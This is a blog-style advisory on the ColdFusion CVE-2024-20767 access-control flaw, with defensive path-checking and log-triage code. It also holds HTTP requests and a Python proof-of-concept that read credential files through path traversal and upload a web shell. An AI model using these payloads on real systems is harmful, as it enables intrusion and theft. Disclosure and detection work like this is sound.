A critical security bug was found in Adobe ColdFusion—tracked as CVE-2024-20767. If you run ColdFusion 2023.6, 2021.12 or any earlier release, you could be at risk. The vulnerability is all about improper access control. This means attackers can bypass built-in security checks and get access to restricted files on the server. Even worse, with some simple HTTP requests, they might be able to WRITE files too, not just read them.

Let's break down what this means, how the exploit works, and what you need to do about it.

All of this can be done remotely, with no user interaction required.

This can lead to full compromise—think database leaks, configuration file exposure (like passwords.conf or Application.cfc), planting of malware, and more.

Official Description

> "ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction."
> — Adobe Security Bulletin (APSB24-17)

How the Exploit Works: Technical Deep Dive

The root problem is how ColdFusion handles input for certain file operations. Normally a web app should verify whether the user is allowed to access a file before reading from or writing to it. Because of improper access control, ColdFusion fails to perform this check carefully in several endpoints.

One such endpoint is the administrative API under /CFIDE/administrator/.

In some publicly released proof-of-concept (PoC) exploits, attackers abuse a combination of:

- Path traversal (using ../ to climb into sensitive folders)

A Classic Read Example

Here's an example request that tries to fetch the password hash from a ColdFusion server’s Application.cfc file:

```http
POST /CFIDE/adminapi/base.cfc?method=getFileData HTTP/1.1
Host: vulnerable-server.com
Content-Type: application/x-www-form-urlencoded

filePath=../../../../Application.cfc
```

- It posts data to a ColdFusion admin API endpoint.
- It tricks ColdFusion into reading a file outside the allowed folders by using ../.
- If not properly patched, the server responds with the contents of Application.cfc, including any database credentials.

A Write Example

Attackers can use a similar trick to upload a malicious file (like a web shell). Here's how it might look:

```http
POST /CFIDE/adminapi/base.cfc?method=writeFile HTTP/1.1
Host: vulnerable-server.com
Content-Type: application/x-www-form-urlencoded

filePath=../../../../wwwroot/hax.cfm&fileContent=<cfexecute name="cmd.exe" arguments="/c whoami">
```

- The malicious hax.cfm file now exists on the target.
- Visiting http://vulnerable-server.com/hax.cfm could let an attacker run commands.
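What the missing access-control check looks like when it is present, covering both the read and the write request above. The following is an added example, not code from the original post or from Adobe: a Python version of the containment check a file read/write endpoint should perform before touching the filesystem, run against the two filePath values from the requests. The upload root, the ALLOWED_ROOT and EXECUTABLE_EXTENSIONS names, the extension deny-list and the benign sample paths are assumptions for illustration.

```python
import os
from pathlib import PurePosixPath

# Assumed root that a read/write endpoint is allowed to touch; a real deployment
# would use its own, and it need not exist for the checks below to work.
ALLOWED_ROOT = "/opt/coldfusion/cfusion/wwwroot/uploads"
# Extensions the application server would execute if they landed in a web-served folder.
EXECUTABLE_EXTENSIONS = {".cfm", ".cfc", ".cfml", ".jsp"}


class AccessDenied(Exception):
    """Raised when a request would touch a file outside the permitted root."""


def resolve_under_root(user_path, root=ALLOWED_ROOT):
    """Map an untrusted relative path onto an absolute path inside ``root``.

    Absolute paths, empty paths and any '..' component are rejected up front;
    the joined path is then resolved (following symlinks) and re-checked so a
    symlink inside the root cannot point the request back outside it.
    """
    # Treat backslashes as separators so Windows-style '..\\' is caught too.
    rel = PurePosixPath(user_path.replace("\\", "/"))
    if rel.is_absolute() or not rel.parts:
        raise AccessDenied(f"rejected path: {user_path!r}")
    if ".." in rel.parts:
        raise AccessDenied(f"traversal sequence in path: {user_path!r}")
    real_root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(real_root, *rel.parts))
    if os.path.commonpath([real_root, candidate]) != real_root:
        raise AccessDenied(f"path escapes root: {user_path!r}")
    return candidate


def check_write_target(user_path, root=ALLOWED_ROOT):
    """Containment check plus a refusal to create server-executable templates."""
    target = resolve_under_root(user_path, root)
    if os.path.splitext(target)[1].lower() in EXECUTABLE_EXTENSIONS:
        raise AccessDenied(f"refusing to write executable template: {user_path!r}")
    return target


def classify(user_path, write=False):
    """Return 'allowed' or 'denied: <reason>' for one request value."""
    try:
        if write:
            check_write_target(user_path)
        else:
            resolve_under_root(user_path)
        return "allowed"
    except AccessDenied as exc:
        return f"denied: {exc}"


if __name__ == "__main__":
    # Constructed inputs: the two filePath values from the requests above plus two benign ones.
    for path, write in [
        ("../../../../Application.cfc", False),
        ("../../../../wwwroot/hax.cfm", True),
        ("reports/2024-q1.csv", False),
        ("notes/readme.cfm", True),
    ]:
        print(f"{'write' if write else 'read':5}  {path!r:35}  {classify(path, write)}")
```

The lexical '..' check alone is enough to stop the two requests from the write-up; the realpath containment check is there for the case the page does not show, a symlink under the upload root. Refusing executable extensions on write is a second, independent layer: even if a containment check were bypassed, the server would not be handed a template it will execute.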

Here’s a *basic* proof-of-concept exploit in Python:

```python
import requests

target = "http://vulnerable-server.com"
read_endpoint = "/CFIDE/adminapi/base.cfc?method=getFileData"
write_endpoint = "/CFIDE/adminapi/base.cfc?method=writeFile"

# Directory traversal to read file
data = {"filePath": "../../../../ColdFusion2021/cfusion/lib/password.properties"}
r = requests.post(target + read_endpoint, data=data)
print("Password File Contents:")
print(r.text)

# Upload a web shell!
web_shell = '<cfoutput>#CreateObject("java", "java.lang.Runtime").getRuntime().exec("whoami")#</cfoutput>'
data = {"filePath": "../../../../wwwroot/cf_shell.cfm", "fileContent": web_shell}
r = requests.post(target + write_endpoint, data=data)
if r.status_code == 200:
    print("Shell uploaded!")
else:
    print("Upload failed.")
```

---

Exploitability

The most dangerous part? No authentication is required, and no user interaction. If /CFIDE/ or admin APIs are internet-exposed, attacks are trivial and automated scripts can find vulnerable targets with ease.

- Are you running ColdFusion 2023.6, 2021.12 or older?
- Is /CFIDE/ (especially /CFIDE/adminapi/) exposed to the internet or untrusted networks?
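If /CFIDE/ has been reachable, the next question is whether anyone has already hit it. The following is an added example, not from the original post or from Adobe: a small Python triage script that parses Apache-style combined access logs and flags the traffic patterns described above (requests to /CFIDE/ from outside an admin network, traversal sequences in the URI, calls to the adminapi file methods, and a .cfm/.cfc request from the same source shortly after a writeFile call). The admin network range, the 120-second correlation window, the rule names and the sample log lines are constructed assumptions. The POST body, where the filePath value travels, is not recorded in an access log, so the rules key on the URI path, the query string and the source address.

```python
import ipaddress
import re
from collections import Counter
from datetime import datetime, timedelta
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed management network: the only sources expected to reach /CFIDE/ at all.
ADMIN_NETS = [ipaddress.ip_network("10.0.0.0/8")]
# Admin API methods named in the write-up; compared case-insensitively.
FILE_METHODS = {"getfiledata", "writefile"}
# Assumed correlation window between a writeFile call and a follow-up template hit.
WEBSHELL_WINDOW = timedelta(seconds=120)

# Apache/NGINX "combined" format; only the fields the rules need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<verb>[A-Z]+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) '
)
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")

# Constructed sample traffic: the request sequence from the write-up (203.0.113.7),
# an encoded traversal probe, a legitimate admin session and ordinary user traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Mar/2024:12:15:06 +0000] "POST /CFIDE/adminapi/base.cfc?method=getFileData HTTP/1.1" 200 1422 "-" "python-requests/2.31"',
    '203.0.113.7 - - [18/Mar/2024:12:15:09 +0000] "POST /CFIDE/adminapi/base.cfc?method=writeFile HTTP/1.1" 200 12 "-" "python-requests/2.31"',
    '203.0.113.7 - - [18/Mar/2024:12:15:11 +0000] "GET /hax.cfm HTTP/1.1" 200 310 "-" "python-requests/2.31"',
    '198.51.100.23 - - [18/Mar/2024:12:20:00 +0000] "GET /CFIDE/scripts/ajax/package/cfajax.js?x=..%2f..%2f..%2fApplication.cfc HTTP/1.1" 404 199 "-" "curl/8.4.0"',
    '10.0.0.5 - - [18/Mar/2024:12:30:00 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [18/Mar/2024:12:31:00 +0000] "GET /index.cfm HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Return a dict with ip, ts (aware datetime), verb, uri, status; None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def decode_fully(value, rounds=3):
    """URL-decode repeatedly so double-encoded sequences like %252e%252e are caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyse(lines):
    """Run the detection rules over log lines; returns one dict per alert, in log order."""
    alerts = []
    last_write = {}  # source ip -> timestamp of its most recent writeFile call
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip = ipaddress.ip_address(rec["ip"])
        parts = urlsplit(rec["uri"])
        path, query = decode_fully(parts.path), decode_fully(parts.query)
        lower_path = path.lower()
        external = not any(ip in net for net in ADMIN_NETS)

        def alert(rule):
            alerts.append({"rule": rule, "ip": rec["ip"], "uri": rec["uri"], "ts": rec["ts"]})

        if lower_path.startswith("/cfide/") and external:
            alert("cfide_external")
        if TRAVERSAL_RE.search(path) or TRAVERSAL_RE.search(query):
            alert("traversal_in_uri")
        if lower_path.startswith("/cfide/adminapi/"):
            methods = {v.lower() for v in parse_qs(query).get("method", [])}
            if methods & FILE_METHODS:
                alert("adminapi_file_method")
            if "writefile" in methods:
                last_write[rec["ip"]] = rec["ts"]
        elif lower_path.endswith((".cfm", ".cfc")):
            # A template requested shortly after the same source wrote a file:
            # the pattern left by dropping a web shell under the web root.
            seen = last_write.get(rec["ip"])
            if seen is not None and rec["ts"] - seen <= WEBSHELL_WINDOW:
                alert("possible_webshell")
    return alerts


def rule_counts(lines):
    """Summarise alerts per rule, e.g. for a quick triage report."""
    return dict(Counter(a["rule"] for a in analyse(lines)))


if __name__ == "__main__":
    for a in analyse(SAMPLE_LOG):
        print(f"{a['ts']:%H:%M:%S} {a['rule']:20} {a['ip']:15} {a['uri']}")
    print(rule_counts(SAMPLE_LOG))
```

On the sample lines the script raises seven alerts: the two admin API calls from 203.0.113.7 each trigger both the exposure rule and the file-method rule, the /hax.cfm request two seconds after the writeFile call is flagged as a possible web shell, and the encoded probe from 198.51.100.23 is caught by the exposure and traversal rules. The session from 10.0.0.5 is silent because it comes from the assumed admin network, which is the point of pairing these rules with the firewall restriction: once /CFIDE/ is only reachable from that network, any remaining hit on the exposure rule is worth a look.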

PATCH NOW:

1. Apply the Adobe hotfixes and updates:
   - ColdFusion 2021 Update 13
2. Block /CFIDE/ endpoints from internet or untrusted access at the firewall level.

References & Further Reading

- Adobe Security Bulletin APSB24-17 (Original Source)
- ColdFusion Security Updates
- Rapid7 Analysis: ColdFusion Improper Access Control
- US-CERT NVD Entry for CVE-2024-20767

The Bottom Line

CVE-2024-20767 is a critical, easy-to-exploit flaw affecting unpatched ColdFusion servers. It lets attackers freely read or write files. Thousands of servers on the internet still have /CFIDE/ exposed—it only takes one request to start an attack.

If you use ColdFusion, patch immediately and make sure administrative interfaces are never exposed to the internet. If you’re behind, attackers are already scanning for you.

Timeline

Published on: 03/18/2024 12:15:06 UTC
Last modified on: 03/18/2024 12:38:25 UTC